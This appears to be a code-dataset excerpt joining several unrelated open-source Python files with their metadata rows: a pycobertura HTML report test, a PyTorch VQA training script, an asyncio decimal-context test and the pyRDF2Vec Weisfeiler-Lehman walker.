<td><a href="#dummy/dummy3.py">dummy/dummy3.py</a></td>
<td>+2</td>
<td><span class="red">+2</span></td>
<td>-</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>+4</td>
<td><span class="red">+1</span></td>
<td>+31.06%</td>
</tr>
</tfoot>
</table>
</div>
</body>
</html>"""
def test_html_report_delta():
from pycobertura.reporters import HtmlReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = HtmlReporterDelta(cobertura1, cobertura2)
html_output = report_delta.generate()
assert '.red {color: red}' in html_output
assert '.green {color: green}' in html_output
assert "normalize.css" in html_output
assert "Skeleton V2.0" in html_output
assert remove_style_tag(html_output) == u"""\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
<th>Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#dummy/dummy.py">dummy/dummy.py</a></td>
<td>-</td>
<td><span class="green">-2</span></td>
<td>+40.00%</td>
<td><span class="green">-5</span>, <span class="green">-6</span>
</td>
</tr>
<tr>
<td><a href="#dummy/dummy2.py">dummy/dummy2.py</a></td>
<td>+2</td>
<td><span class="red">+1</span></td>
<td>-25.00%</td>
<td><span class="green">-2</span>, <span class="green">-4</span>, <span class="red">+5</span>
</td>
</tr>
<tr>
<td><a href="#dummy/dummy3.py">dummy/dummy3.py</a></td>
<td>+2</td>
<td><span class="red">+2</span></td>
<td>-</td>
<td><span class="red">+1</span>, <span class="red">+2</span>
</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>+4</td>
<td><span class="red">+1</span></td>
<td>+31.06%</td>
<td></td>
</tr>
</tfoot>
</table><div class="legend">
<dl>
<dt><code>code</code></dt><dd>coverage unchanged</dd>
<dt class="hit"><code>code</code></dt><dd>coverage increased</dd>
<dt class="miss"><code>code</code></dt><dd>coverage decreased</dd>
<dt><code>+</code></dt><dd>line added or modified</dd>
</dl>
</div>
<h4 id="dummy/dummy.py">dummy/dummy.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>2
3
4
5
6 +
</pre>
</td>
<td class="source">
<pre><span class="noop"> pass
</span><span class="noop">
</span><span class="noop">def bar():
</span><span class="hit"> a = 'a'
</span><span class="hit"> d = 'd'
</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="dummy/dummy2.py">dummy/dummy2.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>1
2 +
3
4 +
5
</pre>
</td>
<td class="source">
<pre><span class="noop">def baz():
</span><span class="hit"> c = 'c'
</span><span class="noop">
</span><span class="hit">def bat():
</span><span class="miss"> pass
</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="dummy/dummy3.py">dummy/dummy3.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>1 +
2 +
</pre>
</td>
<td class="source">
<pre><span class="miss">def foobar():
</span><span class="miss"> pass # This is a very long comment that was purposefully written so we could test how HTML rendering looks like when the boundaries of the page are reached. And here is a non-ascii char: \u015e
</span></pre>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>"""
| 29.940919 | 224 | 0.529708 | [
"MIT"
] | kannaiah/pycobertura | tests/test_reporters.py | 13,683 | Python |
import os
import time
import torch
import torch.nn as nn
import utils
from torch.autograd import Variable
import numpy as np
import matplotlib.pyplot as plt
def instance_bce_with_logits(logits, labels):
assert logits.dim() == 2
loss = nn.functional.binary_cross_entropy_with_logits(logits, labels)
loss *= labels.size(1)
return loss
def compute_score_with_logits(logits, labels):
logits = torch.max(logits, 1)[1].data # argmax
one_hots = torch.zeros(*labels.size()).cuda()
one_hots.scatter_(1, logits.view(-1, 1), 1)
scores = (one_hots * labels)
return scores
def train(model, train_loader, eval_loader, num_epochs, output, opt, wd):
utils.create_dir(output)
# Paper uses AdaDelta
if opt == 'Adadelta':
optim = torch.optim.Adadelta(model.parameters(), rho=0.95, eps=1e-6, weight_decay=wd)
elif opt == 'RMSprop':
optim = torch.optim.RMSprop(model.parameters(), lr=0.01, alpha=0.99, eps=1e-08, weight_decay=wd, momentum=0, centered=False)
elif opt == 'Adam':
optim = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=wd)
else:
optim = torch.optim.Adamax(model.parameters(), weight_decay=wd)
logger = utils.Logger(os.path.join(output, 'log.txt'))
best_eval_score = 0
for epoch in range(num_epochs):
total_loss = 0
train_score = 0
t = time.time()
correct = 0
for i, (v, b, q, a) in enumerate(train_loader):
v = Variable(v).cuda()
b = Variable(b).cuda() # boxes not used
q = Variable(q).cuda()
a = Variable(a).cuda() # true labels
pred = model(v, b, q, a)
loss = instance_bce_with_logits(pred, a)
loss.backward()
nn.utils.clip_grad_norm(model.parameters(), 0.25)
optim.step()
optim.zero_grad()
batch_score = compute_score_with_logits(pred, a.data).sum()
total_loss += loss.data[0] * v.size(0)
train_score += batch_score
total_loss /= len(train_loader.dataset)
train_score = 100 * train_score / len(train_loader.dataset)
model.train(False)
eval_score, bound, V_loss = evaluate(model, eval_loader)
model.train(True)
logger.write('epoch %d, time: %.2f' % (epoch, time.time()-t))
logger.write('\ttrain_loss: %.3f, score: %.3f' % (total_loss, train_score))
logger.write('\teval loss: %.3f, score: %.3f (%.3f)' % (V_loss, 100 * eval_score, 100 * bound))
if eval_score > best_eval_score:
model_path = os.path.join(output, 'model.pth')
torch.save(model.state_dict(), model_path)
best_eval_score = eval_score
def evaluate(model, dataloader):
score = 0
V_loss = 0
upper_bound = 0
num_data = 0
for v, b, q, a in iter(dataloader):
v = Variable(v, volatile=True).cuda()
b = Variable(b, volatile=True).cuda()
q = Variable(q, volatile=True).cuda()
a = Variable(a, volatile=True).cuda()
pred = model(v, b, q, None)
loss = instance_bce_with_logits(pred, a)
V_loss += loss.data[0] * v.size(0)
batch_score = compute_score_with_logits(pred, a.data).sum()
score += batch_score
upper_bound += (a.max(1)[0]).sum()
num_data += pred.size(0)
score = score / len(dataloader.dataset)
V_loss /= len(dataloader.dataset)
upper_bound = upper_bound / len(dataloader.dataset)
return score, upper_bound, V_loss
| 33.942857 | 132 | 0.617284 | [
"MIT"
] | SinghJasdeep/Attention-on-Attention-for-VQA | train.py | 3,564 | Python |
import asyncio
import decimal
import unittest
class DecimalContextTest(unittest.TestCase):
def test_asyncio_task_decimal_context(self):
async def fractions(t, precision, x, y):
with decimal.localcontext() as ctx:
ctx.prec = precision
a = decimal.Decimal(x) / decimal.Decimal(y)
await asyncio.sleep(t)
b = decimal.Decimal(x) / decimal.Decimal(y ** 2)
return a, b
async def main():
r1, r2 = await asyncio.gather(
fractions(0.1, 3, 1, 3), fractions(0.2, 6, 1, 3))
return r1, r2
r1, r2 = asyncio.run(main())
self.assertEqual(str(r1[0]), '0.333')
self.assertEqual(str(r1[1]), '0.111')
self.assertEqual(str(r2[0]), '0.333333')
self.assertEqual(str(r2[1]), '0.111111')
| 29.7 | 66 | 0.535354 | [
"BSD-3-Clause"
] | DISOGitHub/FastCAE | output/python37/Lib/test/test_asyncio/test_context.py | 891 | Python |
from collections import defaultdict
from hashlib import md5
from typing import DefaultDict, Dict, List, Set, Union
import attr
from pyrdf2vec.graphs import KG, Vertex
from pyrdf2vec.typings import Entities, EntityWalks, SWalk
from pyrdf2vec.walkers import RandomWalker
@attr.s
class WLWalker(RandomWalker):
"""Weisfeiler-Lehman walking strategy which relabels the nodes of the
extracted random walks, providing additional information about the entity
representations only when a maximum number of walks is not specified.
Attributes:
_inv_label_map: Stores the mapping of the inverse labels.
Defaults to defaultdict.
_is_support_remote: True if the walking strategy can be used with a
remote Knowledge Graph, False Otherwise.
Defaults to False.
_label_map: Stores the mapping of the inverse labels.
Defaults to defaultdict.
kg: The global KG used later on for the worker process.
Defaults to None.
max_depth: The maximum depth of one walk.
max_walks: The maximum number of walks per entity.
Defaults to None.
md5_bytes: The number of bytes to keep after hashing objects in
MD5. Hasher allows to reduce the memory occupied by a long text. If
md5_bytes is None, no hash is applied.
Defaults to 8.
random_state: The random state to use to keep random determinism with
the walking strategy.
Defaults to None.
sampler: The sampling strategy.
Defaults to UniformSampler.
wl_iterations: The Weisfeiler Lehman's iteration.
Defaults to 4.
"""
wl_iterations = attr.ib(
kw_only=True,
default=4,
type=int,
validator=attr.validators.instance_of(int),
)
_is_support_remote = attr.ib(
init=False, repr=False, type=bool, default=False
)
_inv_label_map = attr.ib(
init=False,
repr=False,
type=DefaultDict["Vertex", Dict[Union[str, int], Union[str, int]]],
factory=lambda: defaultdict(dict),
)
_label_map = attr.ib(
init=False,
repr=False,
type=DefaultDict["Vertex", Dict[int, str]],
factory=lambda: defaultdict(dict),
)
def _create_label(self, kg: KG, vertex: Vertex, n: int) -> str:
"""Creates a label according to a vertex and its neighbors.
kg: The Knowledge Graph.
The graph from which the neighborhoods are extracted for the
provided entities.
vertex: The vertex to get its neighbors to create the suffix.
n: The index of the neighbor
Returns:
the label created for the vertex.
"""
if len(self._label_map) == 0:
self._weisfeiler_lehman(kg)
suffix = "-".join(
sorted(
set(
[
self._label_map[neighbor][n - 1]
for neighbor in kg.get_neighbors(
vertex, is_reverse=True
)
]
)
)
)
return f"{self._label_map[vertex][n - 1]}-{suffix}"
def _weisfeiler_lehman(self, kg: KG) -> None:
"""Performs Weisfeiler-Lehman relabeling of the vertices.
Args:
kg: The Knowledge Graph.
The graph from which the neighborhoods are extracted for the
provided entities.
"""
for vertex in kg._vertices:
self._label_map[vertex][0] = vertex.name
self._inv_label_map[vertex][0] = vertex.name
for n in range(1, self.wl_iterations + 1):
for vertex in kg._vertices:
if self.md5_bytes:
self._label_map[vertex][n] = str(
md5(
self._create_label(kg, vertex, n).encode()
).digest()[: self.md5_bytes]
)
else:
self._label_map[vertex][n] = str(
self._create_label(kg, vertex, n)
)
for vertex in kg._vertices:
for k, v in self._label_map[vertex].items():
self._inv_label_map[vertex][v] = k
def extract(
self, kg: KG, entities: Entities, verbose: int = 0
) -> List[List[SWalk]]:
"""Fits the provided sampling strategy and then calls the
private _extract method that is implemented for each of the
walking strategies.
Args:
kg: The Knowledge Graph.
entities: The entities to be extracted from the Knowledge Graph.
verbose: The verbosity level.
0: does not display anything;
1: display of the progress of extraction and training of walks;
2: debugging.
Defaults to 0.
Returns:
The 2D matrix with its number of rows equal to the number of
provided entities; number of column equal to the embedding size.
"""
self._weisfeiler_lehman(kg)
return super().extract(kg, entities, verbose)
def _map_wl(self, entity: Vertex, pos: int, n: int) -> str:
"""Maps certain vertices to MD5 hashes to save memory. For entities of
interest (provided by the user to the extract function) and predicates,
the string representation is kept.
Args:
entity: The entity to be mapped.
pos: The position of the entity in the walk.
n: The iteration number of the WL algorithm.
Returns:
A hash (string) or original string representation.
"""
if entity.name in self._entities or pos % 2 == 1:
return entity.name
else:
return self._label_map[entity][n]
def _extract(self, kg: KG, entity: Vertex) -> EntityWalks:
"""Extracts random walks for an entity based on a Knowledge Graph.
Args:
kg: The Knowledge Graph.
entity: The root node to extract walks.
Returns:
A dictionary having the entity as key and a list of tuples as value
corresponding to the extracted walks.
"""
canonical_walks: Set[SWalk] = set()
for n in range(self.wl_iterations + 1):
for walk in self.extract_walks(kg, entity):
canonical_walk: List[str] = [
self._map_wl(vertex, i, n) for i, vertex in enumerate(walk)
]
canonical_walks.add(tuple(canonical_walk))
return {entity.name: list(canonical_walks)}
| 34.716495 | 79 | 0.580995 | [
"MIT"
] | vishalbelsare/pyRDF2Vec | pyrdf2vec/walkers/weisfeiler_lehman.py | 6,735 | Python |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.